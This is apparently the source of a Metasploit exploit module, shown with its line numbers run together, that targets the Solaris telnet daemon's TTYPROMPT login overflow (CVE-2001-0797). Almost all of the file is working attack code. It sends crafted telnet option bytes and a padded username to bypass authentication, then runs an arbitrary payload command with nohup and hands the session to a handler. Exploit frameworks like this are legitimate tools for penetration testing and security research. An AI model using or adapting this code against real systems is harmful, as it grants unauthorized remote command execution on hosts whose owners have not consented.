Path: blob/master/modules/exploits/solaris/telnet/ttyprompt.rb
19566 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',15'Description' => %q{16This module uses a buffer overflow in the Solaris 'login'17application to bypass authentication in the telnet daemon.18},19'Author' => [ 'MC', 'cazz' ],20'License' => MSF_LICENSE,21'References' => [22['CVE', '2001-0797'],23['OSVDB', '690'],24['BID', '5531'],25],26'Privileged' => false,27'Platform' => %w[solaris unix],28'Arch' => ARCH_CMD,29'Payload' => {30'Space' => 2000,31'BadChars' => '',32'DisableNops' => true,33'Compat' => {34'PayloadType' => 'cmd',35'RequiredCmd' => 'generic perl telnet'36}37},38'Targets' => [39['Automatic', {}],40],41'DisclosureDate' => '2002-01-18',42'DefaultTarget' => 0,43'Notes' => {44'Stability' => [CRASH_SAFE],45'Reliability' => [REPEATABLE_SESSION],46'SideEffects' => [IOC_IN_LOGS]47}48)49)5051register_options([52Opt::RPORT(23),53OptString.new('USER', [ true, 'The username to use', 'bin' ]),54])55end5657def exploit58connect5960_banner = sock.get_once6162print_status('Setting TTYPROMPT...')6364req =65"\xff\xfc\x18" \66"\xff\xfc\x1f" \67"\xff\xfc\x21" \68"\xff\xfc\x23" \69"\xff\xfb\x22" \70"\xff\xfc\x24" \71"\xff\xfb\x27" \72"\xff\xfb\x00" \73"\xff\xfa\x27\x00" \74"\x00TTYPROMPT" \75"\x01" +76rand_text_alphanumeric(6) +77"\xff\xf0"7879sock.put(req)80select(nil, nil, nil, 0.25)8182print_status('Sending username...')8384filler = rand_text_alpha(1..10)8586req << datastore['USER'] + (" #{filler}" * 65)8788sock.put(req + "\n\n\n")8990select(nil, nil, nil, 0.25)91sock.get_once9293sock.put("nohup #{payload.encoded} >/dev/null 2>&1\n")9495select(nil, nil, nil, 0.25)9697handler98end99end100101102